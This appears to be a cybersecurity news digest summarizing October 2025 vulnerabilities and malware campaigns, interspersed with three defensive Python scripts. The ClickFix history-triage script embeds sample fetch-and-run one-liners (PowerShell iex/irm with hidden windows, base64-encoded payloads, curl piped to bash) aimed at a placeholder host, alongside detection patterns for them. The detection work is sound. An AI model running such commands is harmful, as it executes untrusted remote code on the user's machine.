Daily Brief

Find articles below; each entry carries a machine-generated summary of the linked story.

Total articles found: 12677

Checks for new stories every ~15 minutes

2025-10-20 17:45:58 bleepingcomputer VULNERABILITIES Critical RCE Vulnerability Affects 75,000 WatchGuard Devices Globally
Nearly 76,000 WatchGuard Firebox appliances remain exposed to CVE-2025-9242, a critical (CVSS 9.3) remote code execution flaw, most of them in Europe and North America. The bug is an out-of-bounds write in the Fireware OS 'iked' process, which handles IKEv2 VPN negotiation. Because iked parses IKEv2 traffic before any authentication takes place, an unauthenticated remote attacker can trigger the write with crafted IKEv2 packets and potentially execute code on the firewall. WatchGuard advises upgrading to a fixed Fireware release; Fireware 11.x has reached end of support and will not receive a patch. The vendor advisory also describes a temporary workaround for specific IKEv2 VPN configurations. Shadowserver Foundation scans counted 75,955 vulnerable devices still online as of October 19, 2025. No in-the-wild exploitation has been reported so far, but administrators are urged to patch promptly rather than wait for exploitation reports.
2025-10-20 17:22:59 bleepingcomputer VULNERABILITIES CISA Alerts on Active Exploitation of Windows SMB Vulnerability
CISA reports active exploitation of CVE-2025-33073, a high-severity privilege escalation flaw in the Windows SMB client affecting Windows Server and Windows 10 and 11. The vulnerability, patched in June 2025, stems from improper access control: an attacker who coerces a victim machine into authenticating to an attacker-controlled SMB server can abuse that connection to obtain SYSTEM privileges on the victim. Microsoft credited researchers from CrowdStrike, Synacktiv, SySS GmbH, Google Project Zero, and RedTeam Pentesting GmbH with reporting the flaw. CISA has added it to the Known Exploited Vulnerabilities catalog, which under BOD 22-01 requires federal civilian agencies to patch by November 10. Although the directive binds only federal agencies, CISA urges every organization to apply the June update, noting that flaws of this kind are routine attack vectors for malicious actors against public and private networks alike.
2025-10-20 16:20:37 bleepingcomputer MALWARE GlassWorm Malware Targets Developer Platforms in Supply Chain Attack
A new self-propagating malware, GlassWorm, has been planted in extensions on the OpenVSX registry and the Microsoft Visual Studio Marketplace, reaching roughly 35,800 installations. GlassWorm hides its malicious code behind invisible Unicode characters, so the payload does not show up when a developer reviews the extension source in an editor. It spreads with stolen account credentials, publishing tainted updates to any extension the compromised publisher controls. For command and control it retrieves its server address from transactions on the Solana blockchain, with Google Calendar as a fallback channel, which makes takedown difficult. The final payload, ZOMBI, turns infected developer workstations into nodes for criminal activity, with SOCKS proxy and hidden VNC (HVNC) components providing traffic relaying and remote access. Microsoft has removed the malicious extension from its marketplace, while some compromised extensions remained available on OpenVSX at the time of reporting. The attack follows the pattern of the Shai-Hulud npm worm, underscoring a growing trend of supply chain attacks on developer tooling. Organizations should audit installed extensions, rotate any developer credentials present on affected machines, and make sure their development environments are covered by detection and response.
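The summary above notes that GlassWorm hides its payload behind invisible Unicode characters. The following scanner is an added example, not GlassWorm tooling or code from the report: it walks a directory of source files and reports every code point that renders as nothing in an editor yet is legal inside JavaScript or TypeScript source (format controls such as zero-width spaces and bidi overrides, private-use and unassigned code points, and variation selectors). The default extension directories and the sample snippets are assumptions constructed for the example.

```python
"""Scan source files for invisible or direction-changing Unicode characters.

Added example, not GlassWorm tooling or code from the report.
"""
import sys
import unicodedata
from pathlib import Path

# Unicode general categories that are invisible in an editor: Cf (format controls
# such as zero-width joiners, bidi overrides, tag characters), Co (private use)
# and Cn (unassigned). Variation selectors are category Mn, so they are listed
# by code point range instead.
SUSPECT_CATEGORIES = {"Cf", "Co", "Cn"}
VARIATION_SELECTOR_RANGES = ((0xFE00, 0xFE0F), (0xE0100, 0xE01EF))
# A UTF-8 byte-order mark as the very first character is common and benign.
BOM = "\ufeff"

# Assumption: default extension directories for VS Code and VSCodium on
# Linux/macOS; adjust for your editor and OS.
DEFAULT_ROOTS = ("~/.vscode/extensions", "~/.vscode-oss/extensions")
SCAN_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".json"}


def is_suspect(ch: str) -> bool:
    """True if the character is invisible or a variation selector."""
    cp = ord(ch)
    if any(lo <= cp <= hi for lo, hi in VARIATION_SELECTOR_RANGES):
        return True
    return unicodedata.category(ch) in SUSPECT_CATEGORIES


def scan_text(text: str) -> list:
    """Return one record per suspect character: line, column, code point, name."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if line_no == 1 and col == 1 and ch == BOM:
                continue  # leading BOM is not worth reporting
            if is_suspect(ch):
                hits.append({
                    "line": line_no,
                    "col": col,
                    "codepoint": f"U+{ord(ch):04X}",
                    "name": unicodedata.name(ch, "<unnamed>"),
                    "category": unicodedata.category(ch),
                })
    return hits


def scan_tree(root: Path) -> dict:
    """Scan every source file under root; map path -> hits for files with findings."""
    findings = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = scan_text(text)
            if hits:
                findings[str(path)] = hits
    return findings


# Constructed samples: a clean snippet and one carrying a zero-width space inside
# an identifier plus variation selectors trailing a comment.
SAMPLE_CLEAN = "const greeting = 'hello';\nconsole.log(greeting);\n"
SAMPLE_TAINTED = (
    "const greeting = 'hello';\n"
    "const pay\u200bload = atob('Li4u');\n"
    "// nothing to see here \ufe0f\U000e0101\U000e0102\n"
)

if __name__ == "__main__":
    roots = [Path(p).expanduser() for p in (sys.argv[1:] or DEFAULT_ROOTS)]
    for root in roots:
        if not root.exists():
            continue
        for path, hits in scan_tree(root).items():
            print(f"{path}: {len(hits)} suspect character(s)")
            for h in hits[:5]:  # first few per file keeps the report readable
                print(f"  line {h['line']} col {h['col']}: {h['codepoint']} {h['name']}")
```

Run it against an extensions directory (or pass paths as arguments). Expect some noise: emoji in localized strings carry U+FE0F, and minified bundles sometimes embed tag characters legitimately, so review hits in context; a run of variation selectors or zero-width characters inside an identifier or right after a statement is the pattern worth escalating.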
2025-10-20 14:30:01 bleepingcomputer VULNERABILITIES October Windows Updates Cause Smart Card Authentication Issues
Microsoft's October 2025 security updates are causing smart card authentication and certificate failures on all supported Windows 10, Windows 11, and Windows Server versions. The cause is a deliberate change in Windows Cryptographic Services: RSA-based smart card certificates are now handled through a Key Storage Provider (KSP, the CNG API) instead of the legacy Cryptographic Service Provider (CSP, the CryptoAPI path). Applications that still expect a CSP-backed key fail with errors such as "invalid provider type specified" or "CryptAcquireCertificatePrivateKey error". The change is part of the fix for CVE-2024-30098, a security feature bypass, and isolates smart card cryptographic operations. As a temporary measure, administrators can restore the old behavior by setting the DisableCapiOverrideForRSA registry value, but Microsoft plans to remove that override by April 2026 and advises working with application vendors to move affected software to KSP before then. The same update also fixed problems with IIS websites and HTTP/2 connections to localhost, and lifted compatibility holds that had blocked some Windows 11 24H2 upgrades.
2025-10-20 14:03:31 bleepingcomputer MALWARE Huntress Labs Identifies Malicious OAuth Apps in Microsoft 365 Environments
Huntress Labs has released Cazadora, an open-source script for finding malicious OAuth applications in Microsoft 365 tenants. It enumerates Enterprise Applications (service principals) and App Registrations and flags apps with suspicious characteristics, such as anomalous display names and unusual reply URLs. The release draws on Huntress SOC data: its analysts handle thousands of identity attacks each month, many involving stolen credentials and session tokens, and roughly 10% of surveyed tenants contained "Traitorware", legitimate applications that attackers commonly abuse. Custom-built malicious apps, which Huntress calls "Stealthware", turned up in more than 500 instances across partner tenants. Cazadora gives Microsoft Entra ID (Azure AD) administrators a quick way to audit the apps consented to in their tenant. Huntress also points organizations to its Identity Security Assessment for a broader review of Microsoft 365 identity exposure.
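To make the idea of "suspicious characteristics" concrete, here is an added example of an app triage pass. It is not the Cazadora script and not Huntress code; it works on a simplified record shape (not the Microsoft Graph schema) and applies this example's own heuristics for the traits the write-up names: names that mimic first-party products, reply URLs on tunnel services or raw IPs, risky permissions, and very recent creation. The sample apps, the weights, and the reference time are constructed for the example.

```python
"""Rank OAuth applications in a Microsoft 365 tenant by suspicious traits.

Added example, not the Cazadora script or Huntress code. Record shape and
weights are this example's own.
"""
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import urlparse

# Permissions worth a second look, with example weights.
RISKY_SCOPES = {
    "Mail.ReadWrite": 3, "Mail.Send": 3, "MailboxSettings.ReadWrite": 2,
    "Files.ReadWrite.All": 3, "User.Read.All": 2, "Directory.ReadWrite.All": 4,
    "full_access_as_app": 4, "offline_access": 1,
}
# Names that invite mistaken consent when the publisher is not Microsoft.
FIRST_PARTY_WORDS = ("microsoft", "outlook", "onedrive", "sharepoint",
                     "teams", "office 365", "security", "helpdesk")
# Tunnel services often seen in throwaway reply URLs (example list).
TUNNEL_HOSTS = ("ngrok", "trycloudflare.com", "serveo.net", "loca.lt")
RAW_IP = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
OPAQUE_NAME = re.compile(r"^[a-z0-9]{8,}$")
RECENT_DAYS = 30


def score_reply_urls(urls):
    """Score redirect targets: loopback is mildly odd, plaintext or tunnel hosts more so."""
    score, reasons = 0, []
    for u in urls:
        p = urlparse(u)
        host = (p.hostname or "").lower()
        if host in ("localhost", "127.0.0.1"):
            score += 1
            reasons.append(f"loopback reply URL {u}")
            continue
        if p.scheme != "https":
            score += 2
            reasons.append(f"non-HTTPS reply URL {u}")
        if RAW_IP.match(host):
            score += 3
            reasons.append(f"reply URL on raw IP {host}")
        elif any(t in host for t in TUNNEL_HOSTS):
            score += 3
            reasons.append(f"reply URL on tunnel service {host}")
    return score, reasons


def score_app(app, now):
    """Combine reply URL, naming, permission and age signals into one score."""
    score, reasons = score_reply_urls(app["reply_urls"])
    name = app["name"].strip()
    lname = name.lower()
    if not app["publisher_verified"] and any(w in lname for w in FIRST_PARTY_WORDS):
        score += 3
        reasons.append("impersonates a first-party product name")
    if len(name) <= 4 or (OPAQUE_NAME.match(lname) and any(c.isdigit() for c in lname)):
        score += 2
        reasons.append("opaque or placeholder name")
    for s in app["scopes"]:
        if s in RISKY_SCOPES:
            score += RISKY_SCOPES[s]
            reasons.append(f"risky permission {s}")
    if now - datetime.fromisoformat(app["created"]) <= timedelta(days=RECENT_DAYS):
        score += 2
        reasons.append(f"created within {RECENT_DAYS} days")
    return {"name": name, "score": score, "reasons": reasons}


def triage_apps(apps, now):
    """Return apps ranked highest score first."""
    return sorted((score_app(a, now) for a in apps), key=lambda r: r["score"], reverse=True)


# Constructed sample tenant: one normal line-of-business app and two oddities.
NOW = datetime(2025, 10, 20, tzinfo=timezone.utc)  # fixed reference time
SAMPLE_APPS = [
    {"name": "Contoso Expense Portal", "publisher_verified": True,
     "reply_urls": ["https://expenses.contoso.com/auth/callback"],
     "scopes": ["User.Read"], "created": "2024-03-11T10:00:00+00:00"},
    {"name": "Outlook Helper", "publisher_verified": False,
     "reply_urls": ["https://a1b2c3.ngrok-free.app/cb"],
     "scopes": ["Mail.ReadWrite", "Mail.Send", "offline_access"],
     "created": "2025-10-18T09:12:00+00:00"},
    {"name": "app7x2k9", "publisher_verified": False,
     "reply_urls": ["http://203.0.113.10/callback"],
     "scopes": ["Files.ReadWrite.All"], "created": "2025-09-01T00:00:00+00:00"},
]

if __name__ == "__main__":
    for r in triage_apps(SAMPLE_APPS, NOW):
        print(f"[{r['score']:>2}] {r['name']}")
        for reason in r["reasons"]:
            print(f"      - {reason}")
```

In a real tenant the records would come from Microsoft Graph (the servicePrincipals, applications and oauth2PermissionGrants endpoints) and the reference time from the clock; the scoring is deliberately simple so that each flagged reason can be checked by hand before anyone revokes a grant.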
2025-10-20 12:32:32 thehackernews NATION STATE ACTIVITY F5 Systems Breached by China-Linked Espionage Group UNC5221
F5 has disclosed a breach in which an attacker gained long-term access to its systems and stole BIG-IP source code along with information about undisclosed vulnerabilities. The intrusion is attributed to UNC5221, a China-linked espionage group, which used the BRICKSTORM backdoor; F5 detected it on August 9, 2025, but the attackers had reportedly been inside for more than a year. Elevated scanning for BIG-IP devices was observed in September and October 2025, although it has not been directly linked to the breach. With more than 680,000 BIG-IP devices reachable from the internet, most of them in the U.S., organizations should inventory their F5 appliances and apply F5's updates promptly. The incident illustrates the sustained targeting of edge infrastructure by state-linked actors and the value of close security and intelligence collaboration. Beyond the article's broader recommendations for Zero Trust architectures and AI-assisted detection, the concrete lesson is that edge devices must be patched, monitored, and checked for long-term footholds.
2025-10-20 11:55:20 thehackernews VULNERABILITIES ClickFix Attacks Exploit User Interaction for Security Breaches
ClickFix attacks trick users into running malicious commands themselves, typically through a fake verification or error-fix prompt in the browser that tells them to copy a command and paste it into a run dialog or terminal. Because no malicious attachment or link is delivered by email, traditional email-based phishing defenses see nothing. The technique has been linked to significant breaches, including at Kettering Health and Texas Tech University Health Sciences Center. Attackers lure victims with SEO poisoning and malvertising that lead to convincing lookalike sites. Defenses struggle because the lure domains rotate, the pages are obfuscated, and web-crawling security tools often never see the malicious content. Endpoint Detection and Response (EDR) remains the main line of defense, but it has to distinguish a user-initiated command from legitimate administration while the lures keep adapting. Push Security has introduced a browser-based control that blocks malicious copy-paste actions, and the article recommends pairing user training with browser-based security tooling to reduce exposure.
2025-10-20 10:53:33 thehackernews MALWARE Chrome Extensions Exploit WhatsApp Web for Large-Scale Spam Campaign
Researchers identified 131 Chrome extensions that hijack WhatsApp Web to send bulk spam, with about 20,905 active users, mostly in Brazil. The extensions share a single codebase and automate message sending in a way designed to evade WhatsApp's anti-spam controls, in violation of the Chrome Web Store's Spam and Abuse policy. They are sold under many names and logos, often posing as CRM tools. DBX Tecnologia, the company behind them, runs a reseller program that lets affiliates rebrand and distribute the software with the promise of recurring revenue. The campaign has run for at least nine months and continues to receive updates that adapt to WhatsApp's defenses. Separately, Trend Micro, Sophos, and Kaspersky have reported a WhatsApp worm distributing a banking trojan to Brazilian users. The case shows the need for closer monitoring of browser extension ecosystems, both by the stores themselves and by organizations that allow unmanaged extensions.
2025-10-20 07:25:06 theregister MISCELLANEOUS UK Launches Digital Veteran Card Amid Implementation Delays
The UK government has begun rolling out a digital version of the Veteran Card, intended to make it easier for Armed Forces veterans to prove their status and access services and discounts. The launch slipped past the summer date originally promised, and the Department for Science, Innovation and Technology (DSIT) has not said why. The card is delivered through the GOV.UK One Login app, which is designed to hold digital credentials securely and act as a single route into public services, as part of a wider effort to modernize government services. The digital Veteran Card is separate from the proposed broader digital ID scheme but is built on the same platform, which the government presents as meeting high security standards. The government is also considering digital IDs for voter identification, and it intends to add further credentials to the GOV.UK Wallet over time to widen its use.
2025-10-20 05:35:22 thehackernews NATION STATE ACTIVITY China Accuses NSA of Cyber Attack on National Time Service Center
China's Ministry of State Security (MSS) has accused the U.S. National Security Agency of a cyber attack on the National Time Service Center (NTSC), describing it as a premeditated operation aimed at destabilizing Beijing Time. According to the MSS, the NSA used 42 cyber tools in a multi-stage campaign that began in March 2022 by exploiting flaws in a foreign SMS service to compromise NTSC staff mobile devices, then stole sensitive data and attempted to disrupt the center's high-precision timing systems, which underpin critical infrastructure. The MSS says the attackers routed traffic through virtual private servers in several regions, forged digital certificates, and used encryption to conceal the intrusion. Chinese national security agencies report that they neutralized the attack and hardened the systems that maintain Beijing Time. The MSS further alleges ongoing U.S. cyber operations against China and other countries, using footholds in Asia to obscure attribution. The accusation adds to U.S.-China tensions, with each side trading charges of cyber espionage, misinformation, and public manipulation.
2025-10-19 18:31:37 bleepingcomputer MALWARE TikTok Videos Exploit ClickFix to Spread Aura Stealer Malware
Cybercriminals are using TikTok videos posing as activation guides for Windows, Spotify, Netflix, and other software to spread infostealers. The campaign, spotted by SANS ISC handler Xavier Mertens, is a ClickFix variant: the video instructs viewers to run a PowerShell command that fetches and executes code from a remote site, ultimately installing Aura Stealer. Aura Stealer harvests saved browser credentials, authentication cookies, and cryptocurrency wallet data, putting every account used on the machine at risk. A second payload, source.exe, is downloaded and executed in memory; its purpose has not been determined. Anyone who ran one of these commands should assume their credentials are compromised and reset all passwords, ideally from a clean device. ClickFix lures have become increasingly common and are often tied to ransomware and cryptocurrency theft campaigns. The underlying advice stands: never run commands copied from untrusted sources.
2025-10-19 06:17:30 thehackernews CYBERCRIME Europol Dismantles Global SIM Farm Network Enabling Cybercrime-as-a-Service
Europol's Operation SIMCARTEL has dismantled a SIM farm run as a cybercrime-as-a-service platform, with seven arrests and the seizure of 1,200 SIM box devices holding 40,000 active SIM cards. Authorities in Austria, Estonia, Finland, and Latvia took part, coordinated by Europol and Eurojust. The service supplied temporary phone numbers from more than 80 countries, which customers used to register more than 49 million fake online accounts for phishing, financial fraud, social media abuse, and identity concealment, with victims worldwide. Investigators also tied the platform to extortion, migrant smuggling, and the distribution of child sexual abuse material. Police froze €431,000 in bank accounts and €266,000 in cryptocurrency and seized four luxury vehicles, an indication of the operation's scale. The websites gogetsms[.]com and apisim[.]com were taken down. The case shows that criminal services built on telecommunications infrastructure can be disrupted only through cross-border cooperation.
2025-10-18 15:07:03 bleepingcomputer MALWARE Malicious Campaign Targets macOS Developers with Infostealing Malware
A malvertising campaign is targeting macOS developers with infostealers delivered through fake Homebrew, LogMeIn, and TradingView sites. Google Ads steer victims to more than 85 lookalike domains, which use the ClickFix technique: the page tells the user to paste a base64-encoded command into Terminal. Because the user executes the command directly, Gatekeeper, which inspects downloaded applications, never gets a chance to block the payload. The command installs AMOS (Atomic macOS Stealer) or Odyssey Stealer, which collect hardware information, tamper with system services, and exfiltrate browser credentials and cryptocurrency wallet data. AMOS is sold as malware-as-a-service and includes remote access capability; Odyssey concentrates on browser data and wallets. Developers should never paste Terminal commands from untrusted pages, and should treat a search-ad result as untrusted until the domain has been verified.
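The three ClickFix stories above (the Push Security overview, the TikTok campaign with its PowerShell one-liners, and the macOS campaign with base64-encoded Terminal commands) all end with the victim running a command themselves, which leaves a trace in the user's shell history. The following triage script is an added example, not code from any of those reports or vendors: it scores recorded commands for traits the lures share (remote fetch piped straight into an interpreter, hidden windows, encoded payloads, quarantine stripping) and decodes embedded base64 so an analyst can read what would have run. The indicator list, weights, and sample history lines are this example's own constructions; the domain example.invalid is a reserved placeholder.

```python
"""Triage shell history for ClickFix-style one-liners.

Added example, not code from the reports above. Indicators and weights are
this example's own heuristics.
"""
import base64
import re
import sys
from pathlib import Path

# (regex, weight, reason). Matched case-insensitively against each command.
INDICATORS = [
    (r"\b(iex|invoke-expression)\b", 3, "Invoke-Expression (iex)"),
    (r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl|wget)\b.*\bhttps?://",
     2, "fetches remote content"),
    (r"-(w|windowstyle)\s+hidden", 2, "hidden window"),
    (r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", 3, "encoded PowerShell command"),
    (r"\bmshta\b.*https?://", 3, "mshta loading remote HTA"),
    (r"\|\s*(bash|sh|zsh)\b", 3, "pipes into a shell"),
    (r"\bbase64\s+(-d|-D|--decode)\b", 2, "decodes base64"),
    (r"xattr\s+-[a-z]*d\s+com\.apple\.quarantine", 3, "strips Gatekeeper quarantine flag"),
    (r"\bnohup\b|/tmp/\S+", 1, "runs detached or from a temp path"),
]
ZSH_PREFIX = re.compile(r"^:\s*\d+:\d+;(.*)$")  # zsh extended-history prefix
PS_ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
SH_ENCODED = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|-D|--decode)")


def normalize(raw: str) -> str:
    """Strip zsh extended-history prefixes and surrounding whitespace."""
    raw = raw.strip()
    m = ZSH_PREFIX.match(raw)
    return m.group(1).strip() if m else raw


def score_command(cmd: str):
    """Sum indicator weights for one command; return (score, reasons)."""
    score, reasons = 0, []
    for pattern, weight, reason in INDICATORS:
        if re.search(pattern, cmd, re.IGNORECASE):
            score += weight
            reasons.append(reason)
    return score, reasons


def decode_payloads(cmd: str) -> list:
    """Decode base64 after -enc (UTF-16LE, PowerShell) or in an echo | base64 -d chain."""
    decoded = []
    m = PS_ENCODED.search(cmd)
    if m:
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16le"))
        except ValueError:  # bad padding, non-alphabet chars, odd byte count
            pass
    m = SH_ENCODED.search(cmd)
    if m:
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass
    return decoded


def triage_history(lines, threshold: int = 4) -> list:
    """Return flagged commands with score, reasons and decoded payloads, in file order."""
    flagged = []
    for raw in lines:
        cmd = normalize(raw)
        if not cmd:
            continue
        score, reasons = score_command(cmd)
        decoded = decode_payloads(cmd)
        for payload in decoded:  # score what the payload would do, too
            extra, extra_reasons = score_command(payload)
            score += extra
            reasons += [f"decoded: {r}" for r in extra_reasons]
        if score >= threshold:
            flagged.append({"command": cmd, "score": score, "reasons": reasons, "decoded": decoded})
    return flagged


# Constructed sample history: two benign commands per platform plus one
# plain, one encoded PowerShell lure and one base64 Terminal lure.
PS_B64 = base64.b64encode("iex (irm https://example.invalid/v)".encode("utf-16le")).decode()
SH_B64 = base64.b64encode(b"curl -fsSL https://example.invalid/i | bash").decode()
SAMPLE_HISTORY = [
    "Get-ChildItem C:\\Projects",
    'powershell -w hidden -c "iex (irm https://example.invalid/verify)"',
    f"powershell -nop -w hidden -enc {PS_B64}",
    ": 1729000000:0;brew install wget",
    f": 1729000100:0;echo {SH_B64} | base64 -d | bash",
    ": 1729000200:0;ls -la ~/Downloads",
]

if __name__ == "__main__":
    # Typical inputs: %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt,
    # ~/.zsh_history, ~/.bash_history. With no arguments the constructed sample is used.
    lines = []
    for p in sys.argv[1:]:
        lines += Path(p).read_text(encoding="utf-8", errors="replace").splitlines()
    for hit in triage_history(lines or SAMPLE_HISTORY):
        print(f"[{hit['score']:>2}] {hit['command']}")
        for r in hit["reasons"]:
            print(f"      - {r}")
        for d in hit["decoded"]:
            print(f"      decoded: {d}")
```

Expect legitimate installers to score as well (the real Homebrew install instruction is itself a curl-into-bash one-liner), which is the point: the output is a short list to review, and the decoded payload column tells you immediately whether a flagged line fetched code from a domain you recognise.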
2025-10-18 11:46:14 thehackernews MALWARE New .NET CAPI Backdoor Targets Russian Auto and E-Commerce Sectors
Seqrite Labs has identified CAPI Backdoor, a new .NET malware aimed at Russian automobile and e-commerce firms and delivered through phishing emails carrying ZIP archives. The archive contains a Russian-language decoy document and a Windows shortcut (LNK) file that launches the backdoor through a legitimate Microsoft binary, a living-off-the-land technique that avoids dropping an obviously suspicious executable. CAPI Backdoor steals web browser data, takes screenshots, collects system information, and exfiltrates everything to a remote server. It persists through scheduled tasks and LNK files placed in the Windows Startup folder. A domain impersonating carprice[.]ru points to the automotive targeting. The backdoor checks for virtual machines and installed antivirus products before running, which complicates sandbox analysis and detection. Organizations in these sectors should tighten email filtering for archive attachments and hunt for the published indicators.
2025-10-18 06:51:23 thehackernews MALWARE Silver Fox Expands Winos 4.0 Malware Campaign to Japan and Malaysia
Silver Fox, a China-based cybercrime group, has extended its Winos 4.0 malware campaign to Japan and Malaysia, deploying the HoldingHands RAT for remote access. Initial access comes through phishing emails with malicious PDFs posing as official documents. Winos 4.0 is also distributed through SEO poisoning that sends victims to fake download sites imitating popular software such as Google Chrome and Telegram. Recent activity has shifted toward Malaysia, using deceptive landing pages to deliver HoldingHands, which runs anti-VM checks and terminates security processes before connecting to its command-and-control server, executing operator commands, and, when instructed, updating its C2 address from a value stored in the Windows Registry. A related campaign, Operation Silk Lure, targets Chinese fintech and trading firms with phishing emails containing malicious LNK files that lead to Winos 4.0. Together the campaigns combine persistence, reconnaissance, and evasion, and pose a significant risk of espionage, identity theft, and credential compromise.